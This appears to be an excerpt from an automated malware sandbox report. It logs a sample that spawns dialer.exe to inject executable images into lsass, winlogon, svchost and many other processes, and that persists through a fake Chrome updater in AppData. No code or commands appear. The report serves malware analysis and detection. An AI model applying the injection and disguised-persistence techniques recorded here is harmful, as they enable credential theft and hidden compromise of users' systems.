                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A6532908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 27BC2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B152908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 621A2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F482908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B4B2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 683D2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1382908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2E262908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6C5E2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D5932908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC652908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 78742908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33B42908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D0A2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB4C2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2A642908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CF32908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 49352908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 60DA2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E7B2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F7C2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E8152908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 52342908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9DA92908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 602E2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 197C2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F1A02908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BE342908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 23A12908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FD902908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C2A32908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B2662908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2C892908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\conhost.exe EIP: 8E642908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 24892908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A2282908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A22E2908
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeNtAdjustPrivilegesToken: Direct from: 0x7FF750F65BFEJump to behavior
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeNtQuerySystemInformation: Direct from: 0x7FF6A0405BFEJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAE260000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0B10000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661330000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87F40000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 179537D0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D590000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25306E90000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B940000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADECD70000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D5590A0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9ED0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD731C0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E8C0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B47B60000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20870090000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17184290000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166980000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 1380000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F4197C0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F8F1A00000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 228BE340000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 20823A10000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 144B2660000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1988E640000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F724890000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: PID: 2580 base: 1380000 value: 4D
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeSection loaded: NULL target: unknown protection: readonlyJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeSection loaded: NULL target: unknown protection: readonlyJump to behavior
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeThread register set: target process: 5796Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeThread register set: target process: 6252Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeThread register set: target process: 6208Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeThread register set: target process: 1668Jump to behavior
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeMemory written: C:\Windows\System32\dialer.exe base: 25C231F010Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAE260000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B3F0000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: EF5FC0B010Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 2549FAF010Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 6F4E4CF010Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC670000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0B10000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661330000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED80000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87F40000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 179537D0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D590000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25306E90000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B940000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADECD70000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D5590A0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9ED0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD731C0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E8C0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B47B60000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20870090000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17184290000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166980000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 1380000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F4197C0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F8F1A00000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 228BE340000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 20823A10000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 144B2660000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1988E640000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F724890000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: unknown unknownJump to behavior
